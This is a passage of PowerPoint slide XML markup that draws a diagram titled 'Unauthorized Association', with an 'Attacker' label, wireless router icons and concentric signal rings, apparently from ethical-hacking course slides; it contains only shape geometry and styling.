            <p:cNvPr id="2096" name="Picture 2095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5F553A51-4D7B-4C3D-A0F8-B593BD9A94F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8325667" y="1215622"/>
              <a:ext cx="344501" cy="283459"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2097" name="Picture 2096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7980C8F6-250C-40B8-BB55-3152667CABE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7382713" y="2074921"/>
              <a:ext cx="313183" cy="257690"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2098" name="Picture 2097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01A7A102-1CBA-4538-BFA0-4251691C3BB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2738479" y="1427490"/>
              <a:ext cx="344501" cy="283459"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="2099" name="Straight Arrow Connector 2098">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98C42E12-2F9F-4801-B46A-B0AC5D8E91E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381850" y="2484903"/>
              <a:ext cx="3838350" cy="801138"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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14924766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139848C1-DF8E-4C8B-8DB1-06F39DCC9E7B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2600325" y="158750"/>
            <a:ext cx="6991350" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p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Unauthorized Association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BD3EBA3-ADE3-4AAB-B62A-C6FE3258C0BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3143737" y="1066800"/>
            <a:ext cx="8895863" cy="5210755"/>
            <a:chOff x="2294764" y="1218911"/>
            <a:chExt cx="8895863" cy="5210755"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 1305"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="8266610" y="5211442"/>
              <a:ext cx="2882731" cy="776119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CACACA"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="B2B2B2"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="19050" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd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" name="Oval 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="8881370" y="4388589"/>
              <a:ext cx="1867531" cy="1864754"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                  <a:alpha val="49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0C0C0">
                      <a:alpha val="50000"/>
                    </a:srgbClr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C0C0C0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" name="Freeform 1310"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="8568188" y="5293490"/>
              <a:ext cx="2279575" cy="614244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noFill/>
            <a:ln w="38100" algn="ctr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ACAC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25400" dir="54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pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 13" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\wireless_router_256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2070" y="5186656"/>
              <a:ext cx="612609" cy="6126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" name="Text Box 2985"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="9290532" y="6029225"/>
              <a:ext cx="82266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Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Oval 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="8704784" y="4212266"/>
              <a:ext cx="2220703" cy="2217400"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                  <a:alpha val="49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0C0C0">
                      <a:alpha val="50000"/>
                    </a:srgbClr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C0C0C0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" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="9057956" y="4564912"/>
              <a:ext cx="1514360" cy="1512106"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                  <a:alpha val="49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0C0C0">
                      <a:alpha val="50000"/>
                    </a:srgbClr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C0C0C0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" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="9234542" y="4741236"/>
              <a:ext cx="1161187" cy="1159460"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                  <a:alpha val="49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0C0C0">
                      <a:alpha val="50000"/>
                    </a:srgbClr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C0C0C0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" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="9428627" y="4935032"/>
              <a:ext cx="773017" cy="771867"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                  <a:alpha val="49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0C0C0">
                      <a:alpha val="50000"/>
                    </a:srgbClr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C0C0C0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4" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="9621882" y="5127999"/>
              <a:ext cx="386508" cy="385933"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                  <a:alpha val="49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0C0C0">
                      <a:alpha val="50000"/>
                    </a:srgbClr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C0C0C0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7" name="Group 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5083687" y="1267995"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Oval 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="15546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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" name="Oval 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="174661" y="949014"/>
                <a:ext cx="2104624" cy="210149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" name="Oval 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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" name="Oval 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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3" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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" name="Oval 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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75000"/>
                    <a:alpha val="98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5" name="Group 24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6701095" y="2440491"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Oval 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="15546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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" name="Oval 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="174661" y="949014"/>
                <a:ext cx="2104624" cy="210149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8" name="Oval 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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9" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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0" name="Oval 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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1" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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2" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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33" name="Group 460"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3725247" y="3504831"/>
              <a:ext cx="498124" cy="148936"/>
              <a:chOff x="1728" y="-938"/>
              <a:chExt cx="3134" cy="936"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Freeform 461"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-699"/>
                <a:ext cx="196" cy="630"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 196"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 0 w 196"/>
                  <a:gd name="T3" fmla="*/ 97 h 630"/>
                  <a:gd name="T4" fmla="*/ 196 w 196"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 196 w 196"/>
                  <a:gd name="T7" fmla="*/ 534 h 630"/>
                  <a:gd name="T8" fmla="*/ 0 w 196"/>
                  <a:gd name="T9" fmla="*/ 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630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5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" name="Freeform 462"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1924" y="-165"/>
                <a:ext cx="2043" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T3" fmla="*/ 68 h 163"/>
                  <a:gd name="T4" fmla="*/ 0 w 2043"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 0 w 2043"/>
                  <a:gd name="T7" fmla="*/ 96 h 163"/>
                  <a:gd name="T8" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T9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43" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="163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" name="Freeform 463"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3518" y="-579"/>
                <a:ext cx="1344" cy="456"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 456"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 95 h 456"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 456 h 456"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 362 h 456"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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6">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344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7" name="Freeform 464"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-938"/>
                <a:ext cx="3134" cy="841"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 3134"/>
                  <a:gd name="T1" fmla="*/ 773 h 841"/>
                  <a:gd name="T2" fmla="*/ 0 w 3134"/>
                  <a:gd name="T3" fmla="*/ 239 h 841"/>
                  <a:gd name="T4" fmla="*/ 446 w 3134"/>
                  <a:gd name="T5" fmla="*/ 359 h 841"/>
                  <a:gd name="T6" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T7" fmla="*/ 0 h 841"/>
                  <a:gd name="T8" fmla="*/ 3134 w 3134"/>
                  <a:gd name="T9" fmla="*/ 359 h 841"/>
                  <a:gd name="T10" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T11" fmla="*/ 721 h 841"/>
                  <a:gd name="T12" fmla="*/ 2239 w 3134"/>
                  <a:gd name="T13" fmla="*/ 841 h 841"/>
                  <a:gd name="T14" fmla="*/ 196 w 3134"/>
                  <a:gd name="T15" fmla="*/ 773 h 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4" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="773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38" name="Group 753"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5123023" y="3665313"/>
              <a:ext cx="590550" cy="161636"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Freeform 754"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="658" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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0" name="Freeform 755"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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1" name="Freeform 756"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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2" name="Freeform 757"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2448" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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" name="Freeform 758"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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44" name="Freeform 879"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="8384875" y="2326575"/>
              <a:ext cx="465583" cy="125711"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                <a:gd name="T1" fmla="*/ 54 h 843"/>
                <a:gd name="T2" fmla="*/ 898 w 3137"/>
                <a:gd name="T3" fmla="*/ 0 h 843"/>
                <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                <a:gd name="T5" fmla="*/ 120 h 843"/>
                <a:gd name="T6" fmla="*/ 0 w 3137"/>
                <a:gd name="T7" fmla="*/ 482 h 843"/>
                <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                <a:gd name="T9" fmla="*/ 843 h 843"/>
                <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                <a:gd name="T11" fmla="*/ 482 h 843"/>
                <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                <a:gd name="T13" fmla="*/ 602 h 843"/>
                <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                <a:gd name="T15" fmla="*/ 54 h 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37" h="843">
                  <a:moveTo>
                    <a:pt x="2887" y="54"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="898" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344" y="843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2688" y="482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3137" y="602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="54"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>
            </a:soli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45" name="Group 1453"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8462920" y="1705363"/>
              <a:ext cx="1285595" cy="665543"/>
              <a:chOff x="3234" y="2461"/>
              <a:chExt cx="1300" cy="673"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="Freeform 10"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3234" y="2784"/>
                <a:ext cx="1300" cy="350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60" y="22"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="80" y="43"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="22"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="47" name="Group 1142"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
